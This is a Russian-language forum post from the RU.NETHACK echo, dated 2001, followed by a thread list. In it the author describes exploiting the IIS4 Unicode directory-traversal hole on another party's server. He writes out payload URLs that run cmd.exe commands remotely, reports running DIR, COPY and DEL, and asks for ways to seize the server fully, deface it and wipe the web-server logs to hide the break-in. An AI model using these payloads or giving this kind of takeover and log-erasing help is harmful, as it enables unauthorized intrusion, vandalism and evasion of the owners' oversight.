ru.nethack

 
 - RU.NETHACK -------------------------------------------------------------------
 From : Sergei Kasaurov                      2:5020/400     19 Jan 2001  18:01:35
 To : All
 Subject : CGI-дыра в IIS4
 -------------------------------------------------------------------------------- 
 

 Hашел в одном серваке сабж типа:
 
 http://www.targethost.dom/scripts/..%c0%af../winnt/system32/cmd.exe?/c+ANYCO
 MMAND
 
 С помощью нее могу удаленно выполнить DIR, COPY, DEL и т.д.
 
 Однако, при попытке создать файл на серваке с помощью перенаправления
 ECHO....>
 
 http://www.targethost.dom/scripts/..%c0%af../winnt/system32/cmd.exe?/c+echo+
 MYCOMMAND+>+c:\PATH\FILE
 
 сервер выдает ошибку 500 и не хочет осуществлять перенаправление в файл.
 
 Какие способы подскажете для дальнейшего захвата сервера. Hе имея
 возможности создавать файл, не могу даже отдефейсить сервак :(
 
 И наконец, журналирует ли по умолчанию (исходя из того, что админ - чайник)
 обращения по HTTP IIS. Если да, то в каком логе и как это можно удаленно
 вычистить?
 
 Сергей
 --- ifmail v.2.15dev5
  * Origin: Yartelecom Computer Networks (2:5020/400)
 
 

Вернуться к списку тем, сортированных по: возрастание даты  уменьшение даты  тема  автор 

Тема:    Автор:    Дата:    CGI-дыра в IIS4   Sergei Kasaurov   19 Jan 2001 18:01:35   Re: CGI-дыра в IIS4   Pavel A. Titov   19 Jan 2001 19:22:04   CGI-дыра в IIS4   NiK   19 Jan 2001 18:48:36   CGI-дыра в IIS4   NiK   19 Jan 2001 18:43:46   CGI-дыра в IIS4   Gennady Porev   19 Jan 2001 19:18:00   Re: CGI-дыра в IIS4   Sergei Kasaurov   22 Jan 2001 13:09:38   CGI-дыpа в IIS4   Andrey Sokolov   27 Jan 2001 02:05:33